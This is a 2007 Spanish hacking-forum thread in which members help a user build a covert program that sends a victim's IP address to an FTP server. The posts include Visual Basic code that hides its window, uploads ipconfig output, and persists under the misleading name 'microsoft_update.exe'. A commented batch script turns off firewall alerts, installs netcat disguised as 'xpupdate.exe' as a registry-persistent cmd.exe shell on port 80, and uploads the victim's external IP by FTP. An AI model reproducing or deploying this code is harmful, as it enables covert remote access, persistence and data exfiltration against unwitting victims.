AYUDA URGENTE, MANDAR IP A UN FTP

WHK · 19 Junio 2007, 09:55 AM

También puedes hacer una shell bat que te lo suba por el comando ftp.exe:

CitarPrivate Sub Form_Load()
form1.visible = False
shell("cmd.exe /c ipconfig > ip.txt&&echo o > ftp.txt&&echo ip >> ftp.txt&&echo user >> ftp.txt&&echo pass >> ftp.txt&&echo put ip.txt >> ftp.txt&&echo quit >> ftp.txt&&ftp -s:ftp.txt"),vbhide
End Sub

Como me quedó? XD

cheatmaster · 19 Junio 2007, 10:24 AM

Cita de: WHK en 19 Junio 2007, 09:55 AM
También puedes hacer una shell bat que te lo suba por el comando ftp.exe:

CitarPrivate Sub Form_Load()
form1.visible = False
shell("cmd.exe /c ipconfig > ip.txt&&echo o > ftp.txt&&echo ip >> ftp.txt&&echo user >> ftp.txt&&echo pass >> ftp.txt&&echo put ip.txt >> ftp.txt&&echo quit >> ftp.txt&&ftp -s:ftp.txt"),vbhide
End Sub

Como me quedó? XD

Ves xD este lo veo mas interesante. pero donde iria x ejemplo usuarios.lycos.es xD ? solo veo lo de pass y user.. , PD, Como seria para guardar el ip.txt en: C\window\system\Driver ( es facil guardarlo, pero el que lo suba hay Oo?

WHK · 19 Junio 2007, 10:48 AM

Cuando invocas a la consola de comandos estas trabajando directamente sobre su directorio... o sea %homedrive%%windir%\system32 (C:\windows\system32) por lo cual solo Debes agregarle los comandos cd..&&cd system\drivers

Ok...

te hago el codigo pero ojalá la proxima ves averigues un poco mas sobre el tema porque será la última ves que doy un código hecho sin que la otra persona no sepa ni que hace.

microsoft_update.exe

CitarPrivate Sub Form_Load()
form1.visible = False
shell("cmd.exe /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "Microsoft" /t REG_SZ /d "%homedrive%%windir%\system\driver\microsoft_update.exe" /f"),vbhide
1:
shell("cmd.exe /c set = rnd=%random%&&cd..&&cd system\Driver&&ipconfig > %rnd%.txt&&echo o > ftp.txt&&echo usuarios.lycos.es >> ftp.txt&&echo user >> ftp.txt&&echo pass >> ftp.txt&&echo put %rnd%.txt >> ftp.txt&&echo quit >> ftp.txt&&ftp -s:ftp.txt"),vbhide
goto 1
End Sub

Despues lo comprimes en winrar autoejecutable para que se descomprima en c:\windows\system\driver
Para aprender a usar el winrar de esta manera mira este post:
http://foro.elhacker.net/index.php/topic,159799.0.html

cheatmaster · 19 Junio 2007, 11:41 AM

em em , pero eso es conexion inversa Oo,

q wapo no xD ?

o es esto ?

cheatmaster · 19 Junio 2007, 15:53 PM

el caso, como seria pues con ese codigo ya hace la funcion no ?

CitarDespues lo comprimes en winrar autoejecutable para que se descomprima en c:\windows\system\driver
Para aprender a usar el winrar de esta manera mira este post:

Que quieres decir :?

R41N-W4R3 · 19 Junio 2007, 23:00 PM

Hola a todos, antes de nada saludar ya que es el primer post que pongo en el foro.

Mi técnica para el envío de la ip externa va un poco en relación con el ultimo post de chestmaster, ya que yo realizo la conexión inversa usando netcatt oculto con el winrar y ejecuto un bat en la descompresion del archivo que pego a continuación y espero que te ayude:

@echo off
netsh
set mode offline
set allowedprogram c:\windows\system32\xpupdate.exe allow_nc ENABLE
copy xpupdate.exe c:\windows\system32\
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v xpupdate /t REG_SZ /d "C:\windows\system32\xpupdate -l -d -e cmd.exe -p 80"
xpupdate whatismyip.com 80 < html.txt > out.out
ftp
open
ftp.ftp.es
user
pass
ascii
put out.out
bye
xpupdate -l -d -e cmd.exe -p 80
exit
Vamos a comentar que hace:

netsh --------vamos al modo de control del firewall de xp

set mode offline---- Le indicamos que desactive las alertas

set allowedprogram c:\windows\system32\xpupdate.exe allow_nc ENABLE- Damos paso al netcat (renombrado a xpupdates.exe) en el firewall

copy xpupdate.exe c:\windows\system32\- Lo copiamos a un sitio adecuado

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v xpupdate /t REG_SZ /d "C:\windows\system32\xpupdate -l -d -e cmd.exe -p 80"  Aqui lo introducimos en el registro de inicio para que cada vez que arranque el sistema lo ponga a escuchar en un Puerto determinado y nosotros podamos conectarnos.

xpupdate whatismyip.com 80 < html.txt > out.out  Aquí uso el propio netcat para enviar una cabecera httpo adecuada a la pagina whatismyip.com (la cual nos indica la ip externa desde la que nos conectamos) y asi poder guardar en un archivo de texto (out.out) el resultado, que sera la ip externa de la victima. Muy necesaria si pretendemos saber donde atacar XD...

ftp  Estos pasos solo me envían por ftp esa información aunque podríamos hacerlo de muchas otras formas como una web, etc
open
ftp.ftp.es
user
pass
ascii
put out.out
bye

xpupdate -l -d -e cmd.exe -p 80  Aquí es donde indicamos al netcat que se quede a la escucha para cuando queramos conectarlo. Además lo hace a través del puerto 80 para asegurarnos que el router lo deje pasar.
exit

El contenido de la cabecera http adecuada para el paso xpupdate whatismyip.com 80 < html.txt > out.out se guarda en el archivo html.txt que pego a continuación y que consegui con el software Httpanalizer haciendo una simple captura de la consulta a dicha página.

GET / HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

Si os gusta el post puedo incluir un manual completo con capturas de pantalla que yo mismo he realizado, aunque toda la información necesaria para hacerlo salio de esta completa webbbb saludos a todos

pd: Me acabo de desvirgar en el foro jejejeje

cheatmaster · 19 Junio 2007, 23:15 PM

Yo no entiendo nada xDD T.T !!!

R41N-W4R3 · 20 Junio 2007, 09:23 AM

Antes de nada, conoces la herraienta netcat???

Si no la conoces, en varias secciones del foro (haching basico.....) puedes encontrar estupendos manuales sobre su uso Asi como un estupendo manual sobre como ocultarlo con winrar. No solo lo ocultaremos, ademas, entre otras muchas cosas explico en mi anterior post como enviamos la ip extrerna de la victima a un ftp.

Si hay dudas mas concretas aqui toy...